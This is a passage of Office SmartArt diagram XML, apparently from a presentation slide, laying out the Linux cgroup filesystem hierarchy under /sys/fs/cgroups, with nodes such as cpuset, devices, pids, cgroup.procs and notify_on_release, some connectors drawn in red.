    <dgm:cxn modelId="{B644A94B-C3E0-45A8-8879-1423C0D01F7B}" type="presParOf" srcId="{3F3C880A-585A-4159-A143-CF0BDBA56029}" destId="{1547CC15-98D8-4585-93F8-FB32F376F6EF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{AD34B5A2-8CD6-4365-A7DC-9468AC1373EA}" type="presParOf" srcId="{1547CC15-98D8-4585-93F8-FB32F376F6EF}" destId="{F382E269-D443-4E79-A490-E222B18A40ED}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{305C92E2-B23F-4C83-A2CF-29F8621850E9}" type="presParOf" srcId="{F382E269-D443-4E79-A490-E222B18A40ED}" destId="{E8C15873-A926-4FE5-AB40-BDD829C3E48A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{E5FB2413-B2CF-4B82-9DE4-777F7954DD76}" type="presParOf" srcId="{F382E269-D443-4E79-A490-E222B18A40ED}" destId="{D7EF3A8C-333E-4067-BBEA-534E97E0C2B1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{3AFF301C-2BA8-4766-95A9-D3330C690662}" type="presParOf" srcId="{1547CC15-98D8-4585-93F8-FB32F376F6EF}" destId="{AE478164-8EDC-49D2-AF1B-D6CBAC69E527}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{7B48BD54-BAA2-4310-BC3E-9B5BF283DD57}" type="presParOf" srcId="{1547CC15-98D8-4585-93F8-FB32F376F6EF}" destId="{B4D6937F-F3C3-4D8A-A32C-DBCE5347657E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{3BA46BCA-00E2-4097-822D-6814ACB41D73}" type="presParOf" srcId="{3F3C880A-585A-4159-A143-CF0BDBA56029}" destId="{9816B1EC-E83E-4561-B663-A537448E26A2}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{01B677B2-27A3-44E8-A999-1B2605474B4E}" type="presParOf" srcId="{3F3C880A-585A-4159-A143-CF0BDBA56029}" destId="{950E71AA-C670-477B-9A83-7516ACF65E2A}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{FDD7661C-7A6A-472A-9DB3-1A0C66E9E89A}" type="presParOf" srcId="{950E71AA-C670-477B-9A83-7516ACF65E2A}" destId="{7FA864EE-EF66-4423-90D2-428FEF35A476}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{6E829BF8-5CC1-4CA1-B334-DDD69CC7E28A}" type="presParOf" srcId="{7FA864EE-EF66-4423-90D2-428FEF35A476}" destId="{41829412-49CC-426E-8108-4B441EEF9E1C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{ED730542-9D26-487E-AB0E-B41BCF739F75}" type="presParOf" srcId="{7FA864EE-EF66-4423-90D2-428FEF35A476}" destId="{6B86E4B7-3B56-4F0F-B18D-B350B3D8641E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{216E9CA0-45B6-47F7-819C-EE15401A0804}" type="presParOf" srcId="{950E71AA-C670-477B-9A83-7516ACF65E2A}" destId="{2BF22C01-08BD-4456-A573-A485687892BE}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{9F42E0AE-78E9-446D-86AE-13579B149122}" type="presParOf" srcId="{950E71AA-C670-477B-9A83-7516ACF65E2A}" destId="{DDA6C43A-0D67-4B43-A18E-CB686CFE8046}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{91D1AA91-FDA1-483A-A96D-D3BE3BA3D210}" type="presParOf" srcId="{3F3C880A-585A-4159-A143-CF0BDBA56029}" destId="{1B254077-7700-4884-BB50-56F29058CC59}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{D6DA3705-439A-48FA-B9E2-AEC22D9FA402}" type="presParOf" srcId="{3F3C880A-585A-4159-A143-CF0BDBA56029}" destId="{5E5A0184-FBCA-43E0-B0D7-C6DD6BBD4CD9}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{9F954AA1-2605-4CF8-A11F-87A21834ED22}" type="presParOf" srcId="{5E5A0184-FBCA-43E0-B0D7-C6DD6BBD4CD9}" destId="{0FF06B56-AE8E-42D4-B098-A37B0FD1394C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{D411D416-2214-4C71-B38C-774485F3AA9E}" type="presParOf" srcId="{0FF06B56-AE8E-42D4-B098-A37B0FD1394C}" destId="{FEFCB4E6-BE5D-4883-84F7-FF7C58722A2A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{485C43FE-8CED-41F9-8D17-68F1BC41079A}" type="presParOf" srcId="{0FF06B56-AE8E-42D4-B098-A37B0FD1394C}" destId="{1D3A192E-E654-421B-8D3E-F399459C05EC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{C439A391-8A67-4787-95C5-0E4F5958AEBC}" type="presParOf" srcId="{5E5A0184-FBCA-43E0-B0D7-C6DD6BBD4CD9}" destId="{CFDFB40A-0A1B-4769-9755-F59D799BCC72}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{E9458179-3611-4D74-A327-7D5E557BD350}" type="presParOf" srcId="{5E5A0184-FBCA-43E0-B0D7-C6DD6BBD4CD9}" destId="{7BE8BE15-8DE5-4852-B436-388DC4B05941}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{7FD13418-38B9-412A-83E0-4D3C02C4689C}" type="presParOf" srcId="{3F3C880A-585A-4159-A143-CF0BDBA56029}" destId="{CB25A038-CE0D-4D43-8348-EDF1AF2A25DB}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{14DED1C0-6D71-4B1F-BA53-ED4C67ED8692}" type="presParOf" srcId="{3F3C880A-585A-4159-A143-CF0BDBA56029}" destId="{05CD0340-6CAC-4D63-9B23-8C0B5304ADBA}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{CCE78FAF-A118-4324-A5F2-347FD0D03645}" type="presParOf" srcId="{05CD0340-6CAC-4D63-9B23-8C0B5304ADBA}" destId="{0E56C05F-C174-4D40-9F30-B8792877D1A3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{8934E580-D5D2-4DA8-AEB4-85000DF9A336}" type="presParOf" srcId="{0E56C05F-C174-4D40-9F30-B8792877D1A3}" destId="{26CC1033-BCEA-43AA-B57B-36A9588D59C0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{BE63FACF-364E-4A58-8C41-8E41FC8AF6B0}" type="presParOf" srcId="{0E56C05F-C174-4D40-9F30-B8792877D1A3}" destId="{54EC25CE-9D16-48A2-BDDC-A40D46E21F88}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{9853FCA4-E866-4309-8CBF-CA300303BAB0}" type="presParOf" srcId="{05CD0340-6CAC-4D63-9B23-8C0B5304ADBA}" destId="{EDB1CE97-31A2-4660-B269-416C80F1D951}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{FC65BAB5-F2F1-49BE-AF74-36BC42D52B0E}" type="presParOf" srcId="{05CD0340-6CAC-4D63-9B23-8C0B5304ADBA}" destId="{5EB4D6B6-3297-4C09-A074-91E2447B784E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{05EA91FC-027F-4B70-9DA5-D18162A3FB5D}" type="presParOf" srcId="{3F3C880A-585A-4159-A143-CF0BDBA56029}" destId="{78D6CDF7-92A3-4A15-98F2-7B5E27282B1C}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{AB7E0DDD-E5C7-40A0-A9D9-69304F6C2247}" type="presParOf" srcId="{3F3C880A-585A-4159-A143-CF0BDBA56029}" destId="{EE86FFA6-DC99-46FA-80AC-C92D04F1384C}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{EB2162EB-344A-44D2-B264-24CDC2EA1584}" type="presParOf" srcId="{EE86FFA6-DC99-46FA-80AC-C92D04F1384C}" destId="{FAD42468-89CF-44FE-927D-397CBCC0B782}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{6EBFE7CF-0244-4A4D-845C-13F008A58216}" type="presParOf" srcId="{FAD42468-89CF-44FE-927D-397CBCC0B782}" destId="{9C43F5C5-FDD3-4C49-BA52-A30759012A20}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{C9B1A840-0900-462E-9F23-D4268BDBFF54}" type="presParOf" srcId="{FAD42468-89CF-44FE-927D-397CBCC0B782}" destId="{00BEB603-B26C-4D48-B5FC-C31B83B8FA66}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{FC246B21-2E30-4F0F-8A76-315EBDCA4DE1}" type="presParOf" srcId="{EE86FFA6-DC99-46FA-80AC-C92D04F1384C}" destId="{8BA2110A-31F3-48D0-BC6C-3E1273E86259}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{E1E6C212-917F-4DCE-A024-5F98FB29B1DE}" type="presParOf" srcId="{EE86FFA6-DC99-46FA-80AC-C92D04F1384C}" destId="{07634919-2100-4763-B92E-31D2EBA6E480}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{F3899542-727A-4C1F-B72E-C860020A09E0}" type="presParOf" srcId="{D23AD8EE-93C1-4EF0-914B-275E584C9EE6}" destId="{571A61DF-548C-4ADC-B042-5EDD510F53A4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{14B2B7F2-1AA7-4E5A-9ADE-9F707FE52917}" type="presParOf" srcId="{6140B86D-192C-4990-A829-2348BFC037A5}" destId="{0210292B-6E1B-401C-B150-ED662D062485}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{0492FACF-BD9C-4160-8CC1-C658F502C834}" type="presParOf" srcId="{6140B86D-192C-4990-A829-2348BFC037A5}" destId="{0C7B9659-914B-45DE-8BD1-BAEBE4BEA383}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{D8DDC47A-1D32-4C06-A936-63A44019D2A0}" type="presParOf" srcId="{0C7B9659-914B-45DE-8BD1-BAEBE4BEA383}" destId="{7AD4B1BD-7DC3-45D4-ADF7-9684993EDFDF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{7171D6A9-83F0-412C-A9CF-81BCC9BA5D55}" type="presParOf" srcId="{7AD4B1BD-7DC3-45D4-ADF7-9684993EDFDF}" destId="{BE569898-C06B-4265-BDB8-860FF9DBCC02}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{7DBC430B-CE1F-4D4E-A902-AB067832897A}" type="presParOf" srcId="{7AD4B1BD-7DC3-45D4-ADF7-9684993EDFDF}" destId="{A6225886-3DB7-4E5C-BCD3-F558F1C98CDB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{3BA4E1E5-9877-45A7-85D6-A8DCB25306F9}" type="presParOf" srcId="{0C7B9659-914B-45DE-8BD1-BAEBE4BEA383}" destId="{4B7660EF-9EBD-42D4-84A3-53DF503D2570}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{BD80BB56-1475-440D-8403-A54148598CAF}" type="presParOf" srcId="{0C7B9659-914B-45DE-8BD1-BAEBE4BEA383}" destId="{6F360DE3-E5E7-4CBE-8EE4-533DE9DC14FA}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{001D2FAA-60E0-45EF-A73F-65F6B848AE06}" type="presParOf" srcId="{6140B86D-192C-4990-A829-2348BFC037A5}" destId="{588AC797-A030-4659-BE14-194F33ABD3FD}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{871C077F-B12D-42AC-A271-0EA794872FE5}" type="presParOf" srcId="{6140B86D-192C-4990-A829-2348BFC037A5}" destId="{A831C0A7-C7BC-481F-AF39-55E8F053D0CC}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{6C458372-84C1-40A1-B416-58ACB86A864F}" type="presParOf" srcId="{A831C0A7-C7BC-481F-AF39-55E8F053D0CC}" destId="{588CCEDE-DFF8-463E-AA1B-7F018B2D9181}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{BD567E07-B57F-4950-83A9-64223DDDDDBD}" type="presParOf" srcId="{588CCEDE-DFF8-463E-AA1B-7F018B2D9181}" destId="{2D6A334D-6275-431E-A2FD-AF076EC0800B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{CC99BC1B-F2FE-4341-8264-9B903A0455A1}" type="presParOf" srcId="{588CCEDE-DFF8-463E-AA1B-7F018B2D9181}" destId="{6CF6753F-4B89-4E07-A500-142960564318}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{0A26857E-A2E8-4EDF-9B38-7A7DE272A064}" type="presParOf" srcId="{A831C0A7-C7BC-481F-AF39-55E8F053D0CC}" destId="{B9CED665-D577-4CB0-BADB-C60C32D08EF4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{9EC24051-D1A2-4DE7-B382-B4743ADA4C60}" type="presParOf" srcId="{A831C0A7-C7BC-481F-AF39-55E8F053D0CC}" destId="{F9D6BF45-AF58-44EB-9CC0-E182646795ED}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/3/layout/HorizontalOrganizationChart"/>
    <dgm:cxn modelId="{ADFE4156-EE66-44DA-B0BE-05ADDD59B3E9}" type="presParOf" srcId="{787F2768-9D87-4D7B-B7A5-CC81685C56F0}" destId="{C0EDB388-B651-4408-B2E8-A24EF246F48B}"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87747C4-0450-45A1-92B0-FD187A05A858}"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137BF1E8-700B-463B-8FC5-55A410DC87F6}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>/sys/fs/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>cgroups</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36B52051-E401-418E-BFF1-619351E9F0AB}" type="parTrans" cxnId="{DE8A18B6-FAA9-42C2-B0AF-DA29793ECA04}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{438FB60C-7E18-4BD9-815D-51B27F8BF17B}" type="sibTrans" cxnId="{DE8A18B6-FAA9-42C2-B0AF-DA29793ECA04}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CE96C1ED-7B76-486B-8843-675EE73C98DB}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>cpuset</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFC81BCD-C642-40E4-8D00-FFF3F221511B}" type="parTrans" cxnId="{B87053F7-713D-4BCB-A86B-197D2D3C06DF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E9A632E-A71F-4E74-9E0E-679301DA5E87}" type="sibTrans" cxnId="{B87053F7-713D-4BCB-A86B-197D2D3C06DF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{533D632E-33DF-4285-AE51-BD966996E5E2}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>devices</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7FBC4AEF-7863-4E43-BC8B-EA4B1B9A5AD0}" type="parTrans" cxnId="{6AA145C0-C8B4-4010-886E-73BF5E26CE30}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FEBFFF24-421D-473A-B86D-8F61E2B8D0E2}" type="sibTrans" cxnId="{6AA145C0-C8B4-4010-886E-73BF5E26CE30}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8ACD0E6F-7768-4B1B-AED0-AC0213CAE850}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>rdma</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7368EF3A-2403-44B5-9C68-71777489FE0F}" type="parTrans" cxnId="{0526FD2A-99A3-4FAC-995E-7552576FAF00}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F7A97018-0D72-46DD-BF81-AC5F8EC3E431}" type="sibTrans" cxnId="{0526FD2A-99A3-4FAC-995E-7552576FAF00}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7EC4698E-129D-485E-A885-3384CAAD9D2C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>pids</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F13785F-9D42-4CA3-8624-65CE75D93DEA}" type="parTrans" cxnId="{CD1A1EEB-49B3-41DB-8725-1DF74468C8D4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE918CF2-488A-4584-832E-F477E10002B3}" type="sibTrans" cxnId="{CD1A1EEB-49B3-41DB-8725-1DF74468C8D4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{383EE767-B207-4441-9C5D-E6C4BC7218DC}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>systemd</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2FDCBEDF-4391-44B7-B5FB-D02AA2A558AB}" type="parTrans" cxnId="{A7886C05-2959-43AD-AC09-283D16E08998}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FEA9E2D2-B433-46EC-BA75-3E30884B7875}" type="sibTrans" cxnId="{A7886C05-2959-43AD-AC09-283D16E08998}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{69A86127-BEED-43E6-A625-DDD212F858DA}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>cgroup.clone_children</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23E6BAE6-2C3B-4B1E-BCF5-A40278159E86}" type="parTrans" cxnId="{71B96964-811E-4EFE-95E4-D6E3E90ABA82}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00AA27E5-B8E2-4181-81C0-DFED32212ED7}" type="sibTrans" cxnId="{71B96964-811E-4EFE-95E4-D6E3E90ABA82}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4353DE3E-19C8-4969-88A5-B4BFF4C95A08}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" smtClean="0"/>
            <a:t>cgroup.procs</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E072C68-64D5-4AC5-8E6D-FF34EF5FDCED}" type="parTrans" cxnId="{7DEAA5B7-D6F9-43CE-8E8D-383440FB4307}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC60324A-F660-44E1-91E9-9CFE35E10107}" type="sibTrans" cxnId="{7DEAA5B7-D6F9-43CE-8E8D-383440FB4307}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7667924-28CC-4450-88C7-9136C5776901}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" smtClean="0"/>
            <a:t>cgroup.sane_behavior</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A07FFB83-3543-4247-B673-5937F74B41DC}" type="parTrans" cxnId="{533FA6BC-371C-4845-97EB-47CA1DFA4A6A}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
        </a:ln>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F3B7135-5D0B-42B8-9D02-9D6B37731486}" type="sibTrans" cxnId="{533FA6BC-371C-4845-97EB-47CA1DFA4A6A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F23BA4E4-207D-4CFA-8C19-D5A6FF5EEA35}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" smtClean="0"/>
            <a:t>notify_on_release</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FF8F5E27-D3DA-41B4-A633-F21535649EF5}" type="parTrans" cxnId="{82E3B8A8-9431-40CB-9690-A70DD0EF4ACF}">
      <dgm:prSet/>
      <dgm:spPr>
        <a:ln>
          <a:solidFill>
